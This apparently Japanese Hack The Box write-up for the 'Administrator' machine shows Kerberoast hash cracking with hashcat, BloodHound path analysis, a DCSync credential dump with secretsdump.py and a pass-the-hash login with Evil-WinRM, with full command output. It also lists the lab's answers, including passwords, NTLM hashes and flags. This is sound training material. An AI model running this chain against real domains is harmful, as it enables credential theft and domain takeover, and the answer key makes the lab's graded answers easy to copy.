$krb5tgs$23$*ethan$ADMINISTRATOR.HTB$administrator.htb/ethan*$6a8cb0e572b64906d735ed344164fc3b$1546362c878c649ca7a612711b26a0193122cf3cddb39f94224b0784f45604aee2c3ad60aba7cbcf551ee2aead38226117b11fe8e71f8e9ddec43844068a65669297d1a45bf5879fb9b33564ce0e0fde8a61100d52bd6f1b9af0dfea8237f35e8970d64d4ed5fd479317ede606afc2be0ec7b10a58961e6fce6b7a9a6b95685888fd0b1a7bc11b9416723b7aab44ee8b4dbdf93c9f67cd0f91a8c5a599ee19c42a6d81df59549700a3916730be8503da0804a9502bab3db9ee25e7b01c0abbb9ecd102dc5ea3fb5c905646eeb504af01cda02ceaed9658cb1db56937a2f81972de4baddaf60293b5cd744107f3a908a198ba4dd1752f02177b6ce9fcb1ce23768f0d86a48f3c8961df8f212c9aa37c65720153bcb8eef8d3f96233a2991b066b0e05cbcbe365c2d536e886085d94079d514fcb66a9b24a90234bfd23e076fa9ce0436368e601b3dafd7d75c7bcfd66851694664da84c7cc71739169e7a64fb97778d9557b7799f3d0268ab76b791e31b5599c11f5fb3ee6145ac7c61163c52068432b74bf8da63145e97eff05c938c46267751bfb0302d3d7b1f6bfb41dbf0478cd37027fb394c07326e0316ab1ac3a8316ec0dade7d6b05827d74f2c3e476b3f2ffcf45ed596bfe336d9779a8b23306fa3a33853105da5ec2d7a25b09ce2c177d0d9f3158fac591b0cd1e77d2edb8261cb63674c324e9a901f1a89e77366aaff13ac4f9a11cebb66b1150f0439fd642bb15ffb29fb6f9302582c15c541af4d3caf5971f4d4d5995a7a29091f07ad067649e6bbd77245d35e45d19730fde567177b61036a0ba55dc6233da093419bd84f9eb342913b16583bc046b12cf7ec1d89030a9d1fc1baa96e97d4038eb49a68f34aca29ef81a0f504e4ea66f0b078dca1f03e2a04b21d46371f018b97488e90d2a7a53ed45385cca73fb5200c88bbc055f10a31e29e2301d71040fcf88a852401db748100512cbed9c135aa02ad4c41d4b5df5b7273aea7ce5224e11c2117ff5385f338710d58fc8aa6d4fa918c8b01292cdeef16ddf0d4a16cf0d266e817fdb11fec0be37de41d201323bfaa80fcb51ddd47cf9b3204f7e06a1fcbd1b0ff3f1b29bcc3e2d095885ff9c09665b515fea8f95d09191a3dfeadf9ede6eb9b61e4c9c551bdd0e8afa6758bc4d5acb70b13bec74c5327ff500781554c303531ac79c7f3c0ea6d4cabb488732c8f72093eca156e298fc57d2f8d7a1a0e43c3033b4cdd6906f467783a630589bc9144449fbfd33dbfc5cd3f9c94200598e0b19d1282c9e33d395296cd2dfc6fe58235205c740d5b6c3d48bf6c020f05cd2faa5e7b7b00f20d6fbf774cb2c33f61e8ad7290d370b3aa8ce400284814d25369c7d588ac7f017541513148a6b8336c37a9c1411fc99e2e494d8d4abd749ed3b9234f7d4a440a74de75791526d9a29c02aa6e5a1fd0f85c432081670c46d52b40758179b279bc1989012fb15d93284f36d32a2b932a8f75687ff182eaeacd440603bc75b284dcc1652762320baee907c7d72e38c:limpbizkit

Session..........: hashcat
Status...........: Cracked
Hash.Mode........: 13100 (Kerberos 5, etype 23, TGS-REP)
Hash.Target......: $krb5tgs$23$*ethan$ADMINISTRATOR.HTB$administrator....72e38c
Time.Started.....: Tue Nov 18 05:50:53 2025 (2 secs)
Time.Estimated...: Tue Nov 18 05:50:55 2025 (0 secs)
Kernel.Feature...: Pure Kernel
Guess.Base.......: File (/usr/share/wordlists/rockyou.txt)
Guess.Queue......: 1/1 (100.00%)
Speed.#1.........:    80630 H/s (5.98ms) @ Accel:512 Loops:1 Thr:1 Vec:4
Recovered........: 1/1 (100.00%) Digests (total), 1/1 (100.00%) Digests (new)
Progress.........: 6144/14344385 (0.04%)
Rejected.........: 0/6144 (0.00%)
Restore.Point....: 4096/14344385 (0.03%)
Restore.Sub.#1...: Salt:0 Amplifier:0-1 Iteration:0-1
Candidate.Engine.: Device Generator
Candidates.#1....: newzealand -> iheartyou
Hardware.Mon.#1..: Util: 30%

Started: Tue Nov 18 05:49:30 2025
Stopped: Tue Nov 18 05:50:56 2025




BloodHoundを用いたActive Directoryの環境を解析(4回目)


(1) 左上部の「ETHAN」を入力して、「ETHAN@ADMINISTRATOR.HTB」のオブジェクトを表示する。


(2) [Analysis] > [Find Shortest Paths to Domain Admins] > [Find Shortest Paths to Domain Admins] をクリックすると、ethanユーザーはAdministratorユーザーへDCSync権限があることが分かる。


(3) DCSyncの線を右クリックで選択し、「Help」をクリックする。


(4) 「Linux Abuse」タブをクリックすると、パスワード変更する際のコマンドが記載されている。


特権昇格(Windowsパスワードハッシュ値を用いたEvil-WinRMのログイン)


(1) secretsdump.pyを用いてWindowsのパスワードはハッシュ値(NTHash)を取得すると、Administratorユーザーのパスワードハッシュ値が「3dc553ce4b9fd20bd016e098d2d2fd2e」であることが分かる。

※Kali Linux上で以下のコマンドを実行する。

$ cd /usr/share/doc/python3-impacket/examples


$ python3 secretsdump.py ADMINISTRATOR.HTB/ethan@10.10.11.42
  →パスワード(limpbizkit)を入力する。
Impacket v0.13.0.dev0 - Copyright Fortra, LLC and its affiliated companies

Password:
[-] RemoteOperations failed: DCERPC Runtime Error: code: 0x5 - rpc_s_access_denied
[*] Dumping Domain Credentials (domain\uid:rid:lmhash:nthash)
[*] Using the DRSUAPI method to get NTDS.DIT secrets
Administrator:500:aad3b435b51404eeaad3b435b51404ee:3dc553ce4b9fd20bd016e098d2d2fd2e:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
krbtgt:502:aad3b435b51404eeaad3b435b51404ee:1181ba47d45fa2c76385a82409cbfaf6:::
administrator.htb\olivia:1108:aad3b435b51404eeaad3b435b51404ee:fbaa3e2294376dc0f5aeb6b41ffa52b7:::
administrator.htb\michael:1109:aad3b435b51404eeaad3b435b51404ee:bb844c1f8b9e66746d0373fffaf755f1:::
administrator.htb\benjamin:1110:aad3b435b51404eeaad3b435b51404ee:2b7be8f06d980586cea4685fc4032f56:::
administrator.htb\emily:1112:aad3b435b51404eeaad3b435b51404ee:eb200a2583a88ace2983ee5caa520f31:::
administrator.htb\ethan:1113:aad3b435b51404eeaad3b435b51404ee:5c2b9f97e0620c3d307de85a93179884:::
administrator.htb\alexander:3601:aad3b435b51404eeaad3b435b51404ee:cdc9e5f3b0631aa3600e0bfec00a0199:::
administrator.htb\emma:3602:aad3b435b51404eeaad3b435b51404ee:11ecd72c969a57c34c819b41b54455c9:::
DC$:1000:aad3b435b51404eeaad3b435b51404ee:cf411ddad4807b5b4a275d31caa1d4b3:::
[*] Kerberos keys grabbed
Administrator:aes256-cts-hmac-sha1-96:9d453509ca9b7bec02ea8c2161d2d340fd94bf30cc7e52cb94853a04e9e69664
Administrator:aes128-cts-hmac-sha1-96:08b0633a8dd5f1d6cbea29014caea5a2
Administrator:des-cbc-md5:403286f7cdf18385
krbtgt:aes256-cts-hmac-sha1-96:920ce354811a517c703a217ddca0175411d4a3c0880c359b2fdc1a494fb13648
krbtgt:aes128-cts-hmac-sha1-96:aadb89e07c87bcaf9c540940fab4af94
krbtgt:des-cbc-md5:2c0bc7d0250dbfc7
administrator.htb\olivia:aes256-cts-hmac-sha1-96:713f215fa5cc408ee5ba000e178f9d8ac220d68d294b077cb03aecc5f4c4e4f3
administrator.htb\olivia:aes128-cts-hmac-sha1-96:3d15ec169119d785a0ca2997f5d2aa48
administrator.htb\olivia:des-cbc-md5:bc2a4a7929c198e9
administrator.htb\michael:aes256-cts-hmac-sha1-96:d26be59ca11c1f346cd637e263b838f518d08f036b36dca348db97f638d4cb41
administrator.htb\michael:aes128-cts-hmac-sha1-96:c7aec25dc075f7ec1f0b22dd94a953f9
administrator.htb\michael:des-cbc-md5:518f45ce7fe35b02
administrator.htb\benjamin:aes256-cts-hmac-sha1-96:9c1152606574f9cb3b9b1a5e34e04792798bb9d89970b6857df2aede47b0f018
administrator.htb\benjamin:aes128-cts-hmac-sha1-96:d705ac926ba470d25d209eac606794fe
administrator.htb\benjamin:des-cbc-md5:1392d99d9243fedf
administrator.htb\emily:aes256-cts-hmac-sha1-96:53063129cd0e59d79b83025fbb4cf89b975a961f996c26cdedc8c6991e92b7c4
administrator.htb\emily:aes128-cts-hmac-sha1-96:fb2a594e5ff3a289fac7a27bbb328218
administrator.htb\emily:des-cbc-md5:804343fb6e0dbc51
administrator.htb\ethan:aes256-cts-hmac-sha1-96:e8577755add681a799a8f9fbcddecc4c3a3296329512bdae2454b6641bd3270f
administrator.htb\ethan:aes128-cts-hmac-sha1-96:e67d5744a884d8b137040d9ec3c6b49f
administrator.htb\ethan:des-cbc-md5:58387aef9d6754fb
administrator.htb\alexander:aes256-cts-hmac-sha1-96:b78d0aa466f36903311913f9caa7ef9cff55a2d9f450325b2fb390fbebdb50b6
administrator.htb\alexander:aes128-cts-hmac-sha1-96:ac291386e48626f32ecfb87871cdeade
administrator.htb\alexander:des-cbc-md5:49ba9dcb6d07d0bf
administrator.htb\emma:aes256-cts-hmac-sha1-96:951a211a757b8ea8f566e5f3a7b42122727d014cb13777c7784a7d605a89ff82
administrator.htb\emma:aes128-cts-hmac-sha1-96:aa24ed627234fb9c520240ceef84cd5e
administrator.htb\emma:des-cbc-md5:3249fba89813ef5d
DC$:aes256-cts-hmac-sha1-96:98ef91c128122134296e67e713b233697cd313ae864b1f26ac1b8bc4ec1b4ccb
DC$:aes128-cts-hmac-sha1-96:7068a4761df2f6c760ad9018c8bd206d
DC$:des-cbc-md5:f483547c4325492a
[*] Cleaning up...


(2) Administratorユーザーの認証情報を用いてEvil-WinRMを実行すると、Administratorユーザーのプロンプトが表示される。

※Kali Linux上で以下のコマンドを実行する。

$ evil-winrm -i 10.10.11.42 -u Administrator -H "3dc553ce4b9fd20bd016e098d2d2fd2e"

Evil-WinRM shell v3.7

Warning: Remote path completions is disabled due to ruby limitation: undefined method `quoting_detection_proc' for module Reline

Data: For more information, check Evil-WinRM GitHub: https://github.com/Hackplayers/evil-winrm#Remote-path-completion

Info: Establishing connection to remote endpoint
*Evil-WinRM* PS C:\Users\Administrator\Documents>


(3) 現在ログインしているユーザー情報を確認すると、administrator\administratorユーザーであることが分かる。

※Administratorユーザーでログインしている攻撃対象のマシン(Administrator)上で以下のコマンドを実行する。

*Evil-WinRM* PS C:\Users\Administrator\Documents> whoami
administrator\administrator


(4) 特権ユーザー用のフラグファイルの内容を確認する。

※Administratorユーザーでログインしている攻撃対象のマシン(Administrator)上で以下のコマンドを実行する。

*Evil-WinRM* PS C:\Users\Administrator\Documents> type C:\Users\Administrator\Desktop/root.txt
ee1e33ea421694ddbb1501b1a80b351c


[補足] Guided ModeのQA


・Task 1

問題(英語訳):What is the lowest TCP port listening on Administrator?
問題(日本語訳):管理者がリッスンする最も低い TCP ポートは何ですか?

答え:21


・Task 2

問題(英語訳):What permission does the Olivia user have over the Michael user (as shown by BloodHound)?
問題(日本語訳):Olivia ユーザーは Michael ユーザーに対してどのような権限を持っていますか (BloodHound によって示されています)?

答え:GenericAll


・Task 3

問題(英語訳):What permission does the Michael user have on the Benjamin user?
問題(日本語訳):Michael ユーザーは Benjamin ユーザーに対してどのような権限を持っていますか?

答え:ForceChangePassword


・Task 4

問題(英語訳):What is the name of a non-default group that Benjamin is a part of?
問題(日本語訳):ベンジャミンが所属する非デフォルト グループの名前は何ですか?

答え:Share Moderators


・Task 5

問題(英語訳):What is the Master Password for Backup.psafe3?
問題(日本語訳):Backup.psafe3 のマスターパスワードは何ですか?

答え:tekieromucho


・Task 6

問題(英語訳):What is the Emily user's password on Administrator?
問題(日本語訳):管理者の Emily ユーザーのパスワードは何ですか?

答え:UXLCI5iETUsIBoFVTj8yQFKoHjXmb


・Submit User Flag

問題(英語訳):Submit the flag located in the Emily user's home directory.
問題(日本語訳):Emily ユーザーのホーム ディレクトリにあるフラグを送信します。

答え:88867486aedea7b4ee438dd64329063d
※「C:\Users\emily\Desktop\user.txt」の内容


・Task 8

問題(英語訳):What permission does the Emily user have over the Ethan user?
問題(日本語訳):Emily ユーザーは Ethan ユーザーに対してどのような権限を持っていますか?

答え:GenericWrite


・Task 9

問題(英語訳):What is the Ethan user's password on Administrator?
問題(日本語訳):管理者の Ethan ユーザーのパスワードは何ですか?

答え:limpbizkit


・Task 10

問題(英語訳):What permission does the Ethan user have over the domain (according to Bloodhound) that will allow for a full domain takeover?
問題(日本語訳):Bloodhound によれば、Ethan ユーザーはドメインに対してどのような権限を持っており、完全なドメイン乗っ取りが可能になるのでしょうか?

答え:DCSync


・Task 11

問題(英語訳):What is the Administrator user's NTLM hash?
問題(日本語訳):管理者ユーザーの NTLM ハッシュとは何ですか?

答え:3dc553ce4b9fd20bd016e098d2d2fd2e


・Submit Root Flag

問題(英語訳):Submit the flag located on the Administrator user's Desktop.
問題(日本語訳):管理者ユーザーのデスクトップにあるフラグを送信します。

答え:ee1e33ea421694ddbb1501b1a80b351c
※「C:\Users\Administrator\Desktop/root.txt」の内容。



関連記事(Hack The Box)